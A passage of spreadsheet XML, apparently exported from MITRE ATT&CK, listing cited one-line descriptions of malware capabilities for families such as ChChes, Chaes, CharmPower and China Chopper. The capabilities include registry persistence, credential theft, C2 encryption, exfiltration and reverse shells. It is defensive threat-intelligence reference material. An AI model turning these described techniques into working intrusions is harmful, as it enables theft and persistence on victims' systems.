    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to download and upload files to the system.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>relationship--d4dc5fe6-fbfb-4718-8a7f-cd1eca70db61</t>
  </si>
  <si>
    <t>[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can obtain a list of local groups of users from a system.(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t>relationship--9c089e25-2028-4afb-9f05-b28d5055f444</t>
  </si>
  <si>
    <t>[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a command to modify a Registry key.(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t>relationship--8ecc61b0-c0b9-4f3a-a6b4-53c88e1d9bb7</t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to use a port scanner on a system.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>relationship--f46bb223-1276-4266-b653-d6b8c2943adf</t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can gather a list of processes running on the machine.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>relationship--333c5688-edc4-40ba-a382-e98f4473d8c7</t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to use a rootkit on a system.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>relationship--f16c71ae-99b1-4aff-b276-13eb7c3ad889</t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) has a module to gather information from the compromrised asset, including the computer version, computer name, IIS version, and more.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>relationship--b844919a-e7d8-4317-9f0d-56338bae818c</t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can gather the IP address from the victim's machine using the IP config command.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>relationship--37fd810c-c64d-482b-98d5-5a19ce77f9f6</t>
  </si>
  <si>
    <t>[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can obtain a list of user accounts from a victim's machine.(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t>relationship--c22f5416-2726-491e-ae10-35ec32ff9173</t>
  </si>
  <si>
    <t xml:space="preserve">[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can obtain a list of the services from a system.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t>relationship--7542421c-f673-4f85-85ae-b4283173c48d</t>
  </si>
  <si>
    <t>[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can run commands on the compromised asset with CMD functions.(Citation: ClearSky Lebanese Cedar Jan 2021)</t>
  </si>
  <si>
    <t>relationship--6188b02d-e7cb-417a-9093-e2d2eea5883f</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</si>
  <si>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</si>
  <si>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relationship--fe0c8388-46fb-4064-9837-56a23339ffaa</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) steals credentials stored inside Internet Explorer.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--9bc7f2ff-7ba1-42f4-9e96-2112e99ab12a</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) can alter the victim's proxy configuration.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--2ade8c03-2395-4175-9a22-8541836f27cd</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) collects the victim's %TEMP% directory path and version of Internet Explorer.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>relationship--a802d52a-01f4-44c8-b80d-d2c746e1e31d</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) is capable of downloading files, including additional modules.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>relationship--92c901ce-5edb-417f-8af5-d569203e241c</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) copies itself to an .exe file with a filename that is likely intended to imitate Norton Antivirus but has several letters reversed (e.g. notron.exe).(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--e68684df-28b4-4f06-b553-cacf14866605</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) collects its process identifier (PID) on the victim.(Citation: Palo Alto menuPass Feb 2017)</t>
  </si>
  <si>
    <t>relationship--e6f69552-fe0e-4b40-ad20-4410048277e6</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) establishes persistence by adding a Registry Run key.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--2e44b66a-0f81-4f60-94aa-c450556bc243</t>
  </si>
  <si>
    <t xml:space="preserve">[ChChes](https://attack.mitre.org/software/S0144) can encode C2 data with a custom technique that utilizes Base64.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)	</t>
  </si>
  <si>
    <t>relationship--434a9327-8e08-4336-adbd-f24a0ee9eba6</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) can encrypt C2 traffic with AES or RC4.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)</t>
  </si>
  <si>
    <t>relationship--e376d1ed-a35a-47c1-98c6-4d37f52b1b84</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) collects the victim hostname, window resolution, and Microsoft Windows version.(Citation: Palo Alto menuPass Feb 2017)(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>relationship--a08dadbf-6f68-415f-9daa-f84571af83a2</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)</t>
  </si>
  <si>
    <t>relationship--03c9b56e-f006-43b2-ac98-bcbe0c05e979</t>
  </si>
  <si>
    <t>S0631</t>
  </si>
  <si>
    <t>Chaes</t>
  </si>
  <si>
    <t>malware--77e0ecf7-ca91-4c06-8012-8e728986a87a</t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) has used the Puppeteer module to hook and monitor the Chrome web browser to collect user information from infected hosts.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t>relationship--cf130e28-dbd6-4312-ba0a-a3cbcf05c064</t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) can steal login credentials and stored financial information from the browser.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t>relationship--f78a77ca-2a03-4a1f-8404-9adf1e504d48</t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) has used search order hijacking to load a malicious DLL.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t>relationship--b2ca0a15-a121-47c0-8123-b3092fe7d8d1</t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) has decrypted an AES encrypted binary file to trigger the download of other files.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t>relationship--ebbb5d6e-9949-436b-85c5-5cd90a681042</t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) has used encryption for its C2 channel.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t>relationship--1d182249-ed44-4e5b-877c-178760379015</t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) has exfiltrated its collected data from the infected machine to the C2, sometimes using the MIME protocol.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t>relationship--682b7ced-a03b-4403-a058-9bc627c62f16</t>
  </si>
  <si>
    <t xml:space="preserve">Some versions of [Chaes](https://attack.mitre.org/software/S0631) stored its instructions (otherwise in a `instructions.ini` file) in the Registry.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t>relationship--b44bf5b1-42f8-4c70-9108-9699e8fa66ec</t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) can download additional files onto an infected machine.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t>relationship--e3a516b0-fa02-43dc-8247-0545a53693b1</t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) has a module to perform any API hooking it desires.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t>relationship--a74d38f5-92dc-4944-b840-0ab567f8f3ab</t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) has used Installutill to download content.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t>relationship--26372fd8-6298-4da6-b412-5fb155f55786</t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) has used JavaScript and Node.Js information stealer script that exfiltrates data using the node process.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t>relationship--ccc14a82-43bc-4eea-b19f-95aba6bdb5e6</t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) requires the user to click on the malicious Word document to execute the next part of the attack.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t>relationship--110ef143-aff1-4e73-abc2-cceaeab69c60</t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) has used an unsigned, crafted DLL module named &lt;code&gt;hha.dll&lt;/code&gt; that was designed to look like a legitimate 32-bit Windows DLL.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t>relationship--91668436-9db8-4a88-9dc0-c55681f80a6f</t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) can modify Registry values to stored information and establish persistence.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t>relationship--9fde7504-bd24-46f5-88d7-4afcb8d37f4a</t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) has used .MSI files as an initial way to start the infection chain.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t>relationship--046716ed-d9ea-4416-a3a6-2dfa87584ce4</t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) used the &lt;code&gt;CreateFileW()&lt;/code&gt; API function with read permissions to access downloaded payloads.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t>relationship--24a3fef1-9b1f-498b-8aca-df90565e6932</t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) has used Python scripts for execution and the installation of additional files.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t>relationship--876a57e9-4a60-4863-a1b7-c1dad9903971</t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) has added persistence via the Registry key &lt;code&gt;software\microsoft\windows\currentversion\run\microsoft windows html help&lt;/code&gt;.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t>relationship--a307922f-1cd2-4f95-aaa4-dcd40a8fcaab</t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) can capture screenshots of the infected machine.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t>relationship--e8a1c5ce-e02f-44f6-939d-a77378f06890</t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) has been delivered by sending victims a phishing email containing a malicious .docx file.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t>relationship--4cfed6dd-68ac-4b0a-acd1-b888c0c69c4f</t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) has used Base64 to encode C2 communications.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t>relationship--1b6f0ec5-55d5-4aee-a90b-30238599d13c</t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) has used a script that extracts the web session cookie and sends it to the C2 server.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t>relationship--8f6ffa28-0a5d-4adc-8789-17f3d83446a0</t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) has collected system information, including the machine name and OS version.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t>relationship--ee466042-fd08-4c86-898d-63fc5d4ed1d6</t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) has collected the username and UID from the infected machine.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t>relationship--5bef7ca6-0d66-4d7c-9972-56781548222a</t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) changed the template target of the settings.xml file embedded in the Word document and populated that field with the downloaded URL of the next payload.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t>relationship--9c22b1e4-df62-417d-a64f-c6f690ebe566</t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) has used VBscript to execute malicious code.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t>relationship--40ac660a-5f6d-4cac-8518-bb8dff6933ea</t>
  </si>
  <si>
    <t>[Chaes](https://attack.mitre.org/software/S0631) has used HTTP for C2 communications.(Citation: Cybereason Chaes Nov 2020)</t>
  </si>
  <si>
    <t>relationship--b6ac2ef7-350d-48ca-9ab9-8a06f9ff84e3</t>
  </si>
  <si>
    <t xml:space="preserve">[Chaes](https://attack.mitre.org/software/S0631) has used [cmd](https://attack.mitre.org/software/S0106) to execute tasks on the system.(Citation: Cybereason Chaes Nov 2020) </t>
  </si>
  <si>
    <t>relationship--c2021918-3624-4473-8246-fb044caf44e6</t>
  </si>
  <si>
    <t>S0220</t>
  </si>
  <si>
    <t>Chaos</t>
  </si>
  <si>
    <t>malware--5bcd5511-6756-4824-a692-e8bb109364af</t>
  </si>
  <si>
    <t>[Chaos](https://attack.mitre.org/software/S0220) conducts brute force attacks against SSH services to gain initial access.(Citation: Chaos Stolen Backdoor)</t>
  </si>
  <si>
    <t>relationship--49c17cdc-72a5-442d-b153-2cc9f9cf059d</t>
  </si>
  <si>
    <t>After initial compromise, [Chaos](https://attack.mitre.org/software/S0220) will download a second stage to establish a more permanent presence on the affected system.(Citation: Chaos Stolen Backdoor)</t>
  </si>
  <si>
    <t>relationship--d4f7fac4-ddc0-40fa-8b16-c61b1de30072</t>
  </si>
  <si>
    <t>[Chaos](https://attack.mitre.org/software/S0220) provides a reverse shell connection on 8338/TCP, encrypted via AES.(Citation: Chaos Stolen Backdoor)</t>
  </si>
  <si>
    <t>relationship--25d4fa6d-4f88-4604-8b9f-cce6f3b5ae4d</t>
  </si>
  <si>
    <t>[Chaos](https://attack.mitre.org/software/S0220) provides a reverse shell is triggered upon receipt of a packet with a special string, sent to any port.(Citation: Chaos Stolen Backdoor)</t>
  </si>
  <si>
    <t>relationship--788ec1d9-9192-46c9-8bc3-7397ccb854df</t>
  </si>
  <si>
    <t>relationship--4847b10f-f9da-4a35-8df8-e235c6244ba2</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can collect data and files from a compromised host.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--ab1b59f1-8629-48f4-ae9f-a18042122cb8</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can retrieve C2 domain information from actor-controlled S3 buckets.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--50bd8457-3c13-483d-a647-cee4f554d490</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can decrypt downloaded modules prior to execution.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--45f7f495-2de8-4f78-87ec-14201cfc1d46</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can exfiltrate gathered data to a hardcoded C2 URL via HTTP POST.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--48d24989-916a-46ba-b5ea-b3db838a3ae0</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can send victim data via FTP with credentials hardcoded in the script.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--37d0c8b8-0b5e-4da5-bd35-5265b8f9d390</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can change its C2 channel once every 360 loops by retrieving a new domain from the actors’ S3 bucket.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--94a1fe68-4c8f-48ca-b186-feca5f800f46</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can delete created files from a compromised system.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--90fc37c2-19cc-450d-ba0b-5c4a3c9039b3</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can enumerate drives and list the contents of the C: drive on a victim's computer.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--74754640-5989-43de-9fab-5a986d9fc8f5</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) has the ability to download additional modules to a compromised host.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--e0a7e8ca-a199-4909-a4da-302bcc6216e6</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can remove persistence-related artifacts from the Registry.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--0167fba6-d37d-46ba-bb07-5fc70b864b3f</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can use PowerShell for payload execution and C2 communication.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--872a8c48-765c-446e-a321-9a80116f8599</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) has the ability to list running processes through the use of `tasklist`.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--a6175b80-3f45-4d17-9e00-67f32b973ea4</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) has the ability to enumerate `Uninstall` registry values.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--f1183695-42c7-4d17-81b3-18d3fdd8822a</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) has the ability to capture screenshots.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--dde11422-660a-42b1-b231-fb2fd98ed644</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can list the installed applications on a compromised host.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--17317bb7-40a1-47a0-8200-c89df3a339b2</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can send additional modules over C2 encoded with base64.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--e550d34c-3828-416b-92ec-a7a6f9524823</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can send additional modules over C2 encrypted with a simple substitution cipher.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--39cf6431-f800-4911-8434-49ce1b2874f1</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can enumerate the OS version and computer name on a targeted system.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--0586324a-680a-46a4-917b-8c00c7211065</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) has the ability to use &lt;code&gt;ipconfig&lt;/code&gt; to enumerate system network settings.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--c7ef866c-18f8-485e-99d2-78b7e48576d8</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can use `netsh wlan show profiles` to list specific Wi-Fi profile details.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--a544c97e-9bc3-415a-94b5-ec4fc209800a</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can use HTTP to communicate with C2.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--93598e52-cf96-4f8a-b4e2-3dab9aa6ddee</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can download additional modules from actor-controlled Amazon S3 buckets.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--a99df039-f5ee-4060-b3ba-b1224acee970</t>
  </si>
  <si>
    <t>The C# implementation of  the [CharmPower](https://attack.mitre.org/software/S0674) command execution module can use &lt;code&gt;cmd&lt;/code&gt;.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--ac5925ff-04f9-416e-b83b-d70392ef9282</t>
  </si>
  <si>
    <t>[CharmPower](https://attack.mitre.org/software/S0674) can use `wmic` to gather information from a system.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>relationship--ef8154b8-b6d3-493f-9bf5-1d5c147108bc</t>
  </si>
  <si>
    <t>S0107</t>
  </si>
  <si>
    <t>Cherry Picker</t>
  </si>
  <si>
    <t>malware--b2203c59-4089-4ee4-bfe1-28fa25f0dbfe</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</si>
  <si>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</si>
  <si>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relationship--cb4af413-9bd7-4f1a-a693-57d11ffccbf5</t>
  </si>
  <si>
    <t>[Cherry Picker](https://attack.mitre.org/software/S0107) exfiltrates files over FTP.(Citation: Trustwave Cherry Picker)</t>
  </si>
  <si>
    <t>relationship--ed2c177c-18fc-4bfd-9169-48af1557a542</t>
  </si>
  <si>
    <t>Recent versions of [Cherry Picker](https://attack.mitre.org/software/S0107) delete files and registry keys created by the malware.(Citation: Trustwave Cherry Picker)</t>
  </si>
  <si>
    <t>relationship--171380bf-41ff-43da-86fe-c131f5f7b97b</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can upload local files.(Citation: FireEye Periscope March 2018)(Citation: Lee 2013)(Citation: NCSC Joint Report Public Tools)(Citation: Rapid7 HAFNIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--14cc9d67-85e2-4aae-8f3b-4201a66b918f</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can list directory contents.(Citation: FireEye Periscope March 2018)(Citation: Rapid7 HAFNIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--fbfa0807-ce03-4448-a50d-f0337d2446f2</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can download remote files.(Citation: FireEye Periscope March 2018)(Citation: Lee 2013)(Citation: NCSC Joint Report Public Tools)(Citation: Rapid7 HAFNIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--30da0c3d-8767-4828-b50d-181d9a89b9a8</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can spider authentication portals.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--73ce71e3-938e-4f5e-b588-32426e874577</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can perform brute force password guessing against authentication portals.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--046d418d-ffcc-4939-87ce-09cfc2885a5a</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s client component is packed with UPX.(Citation: Lee 2013)</t>
  </si>
  <si>
    <t>relationship--1820202b-0994-452a-93e7-ce21496d2ab4</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can change the timestamp of files.(Citation: FireEye Periscope March 2018)(Citation: Lee 2013)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>relationship--a6350331-0c0d-4d0d-90a3-d5cc3e420875</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component executes code sent via HTTP POST commands.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--27561720-48cb-427c-892f-b31ce4d61d9e</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component is a Web Shell payload.(Citation: Lee 2013)</t>
  </si>
  <si>
    <t>relationship--bea7bd3c-1251-4858-8957-a6dc3bb840d2</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component is capable of opening a command terminal.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Lee 2013)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>relationship--19be6ce1-8eea-47ff-b87c-3358d390454d</t>
  </si>
  <si>
    <t>[Chinoxy](https://attack.mitre.org/software/S1041) can use a digitally signed binary ("Logitech Bluetooth Wizard Host Process") to load its dll into memory.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--05e15ff7-e0b1-47e3-a7bd-7f0e8845bf2c</t>
  </si>
  <si>
    <t>The [Chinoxy](https://attack.mitre.org/software/S1041) dropping function can initiate decryption of its config file.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--356aa4b0-e6c2-4ef7-a3b2-837c25c283b3</t>
  </si>
  <si>
    <t>[Chinoxy](https://attack.mitre.org/software/S1041) has used the name `eoffice.exe` in attempt to appear as a legitimate file.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--e3caf4ea-efa0-4919-8bef-1b56425f7ef5</t>
  </si>
  <si>
    <t>[Chinoxy](https://attack.mitre.org/software/S1041) has encrypted its configuration file.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--af85b32a-7b5e-48ea-9777-50d4d625a122</t>
  </si>
  <si>
    <t>[Chinoxy](https://attack.mitre.org/software/S1041) has established persistence via the `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` registry key and by loading a dropper to `(%COMMON_ STARTUP%\\eoffice.exe)`.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--6d4a7150-60f9-4ed5-b24b-088c76d6ab73</t>
  </si>
  <si>
    <t>S0667</t>
  </si>
  <si>
    <t>Chrommme</t>
  </si>
  <si>
    <t>malware--579607c2-d046-40df-99ab-beb479c37a2a</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) can encrypt and store on disk collected data before exfiltration.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--02174a5c-9cda-4ddc-9952-1ff1b956d31e</t>
  </si>
  <si>
    <t>04 May 2022</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) can collect data from a local system.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--da542c01-9b62-4e42-9036-809ceb31eb8d</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) can decrypt its encrypted internal code.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--53b64a61-b521-4767-9c3a-bb73d518aa15</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) can exfiltrate collected data via C2.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--98402b9f-d9c6-4200-8f05-80c4b46da2bf</t>
  </si>
  <si>
    <t>05 May 2022</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) can download its code from C2.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--4253a9ab-fddb-4c2f-b4c7-c4bc8182d9a4</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) can store captured system information locally prior to exfiltration.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--5fd8740a-6197-4099-a4d9-af0c9421cfc2</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) can use Windows API including `WinExec` for execution.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--a483131c-b3b5-4682-aafc-2761d75e2168</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) can encrypt sections of its code to evade detection.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--86c83427-c35b-46c2-9c55-90b1967bed49</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) can set itself to sleep before requesting a new command from C2.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--b7113807-356f-455b-aaba-5c2822dd1394</t>
  </si>
  <si>
